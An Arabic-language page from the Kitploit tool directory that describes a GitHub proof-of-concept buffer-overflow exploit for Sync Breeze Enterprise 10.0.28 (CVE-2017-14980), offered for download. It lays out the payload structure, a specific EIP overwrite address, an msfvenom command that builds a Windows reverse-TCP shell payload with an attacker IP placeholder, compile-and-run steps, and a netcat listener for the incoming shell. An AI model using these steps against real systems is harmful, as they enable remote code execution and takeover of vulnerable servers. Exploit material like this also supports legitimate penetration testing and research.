Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — إثبات مفهوم لاستغلال تجاوز السعة المخزنية لـ Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). يرسل حمولة HTTP POST مصممة للكتابة فوق EIP وتنفيذ شيل كود x86 مخصص لتنفيذ أكواد عشوائية. | Kitploit
أدوات/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقاستغلال الملفات الثنائية
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-14980_syncbreeze_10.0.28_bof

إثبات مفهوم لاستغلال تجاوز السعة المخزنية لـ Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). يرسل حمولة HTTP POST مصممة للكتابة فوق EIP وتنفيذ شيل كود x86 مخصص لتنفيذ أكواد عشوائية.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

استغلال - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

يحتوي هذا المستودع على استغلال تجاوز سعة المخزن المؤقت (BOF) كدليل على المفهوم لـ Sync Breeze Enterprise الإصدار 10.0.28، ويستهدف الثغرة المعروفة باسم CVE-2017-14980.

الوصف

توجد الثغرة بسبب التحقق غير السليم من الإدخال عند معالجة حقل password في طلب POST إلى نقطة النهاية /login.
يمكن للمهاجم إرسال قيمة طويلة للغاية في هذا الحقل، مما يؤدي إلى الكتابة فوق EIP ويسمح بتنفيذ تعليمات عشوائية.

يُرسل هذا الاستغلال حمولة مصممة بعناية تتكون من:

  • 520 بايت من الحشو ('A')
  • 4 بايت للكتابة فوق EIP
  • منزلق NOP بطول 20 بايت
  • شيلكود Windows x86، يمكن تخصيصه لتنفيذ أوامر عشوائية

طريقة العمل

  1. يُنشئ الاستغلال مخزنًا مؤقتًا خبيثًا يحتوي على الشيلكود المضمن.
  2. يُرسل طلب HTTP POST إلى الخادم الضعيف مع الحمولة في حقل password.
  3. أثناء معالجة الطلب، يقوم التطبيق بالكتابة فوق مؤشر التعليمات (EIP) وينفذ الشيلكود الذي قدمه المهاجم.

المتطلبات

  • مترجم C (مثل gcc)
  • وصول شبكي إلى هدف يعمل بـ Sync Breeze Enterprise 10.0.28
  • تعديل عنوان EIP (\x83\x0C\x09\x10) والشيلكود إذا لزم الأمر

مثال على توليد الشيلكود باستخدام msfvenom:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
root@kitploit:~
gcc exploit.c -o exploit
./exploit

root@kitploit:~
nc -nlvp 4444
تنزيل الأداة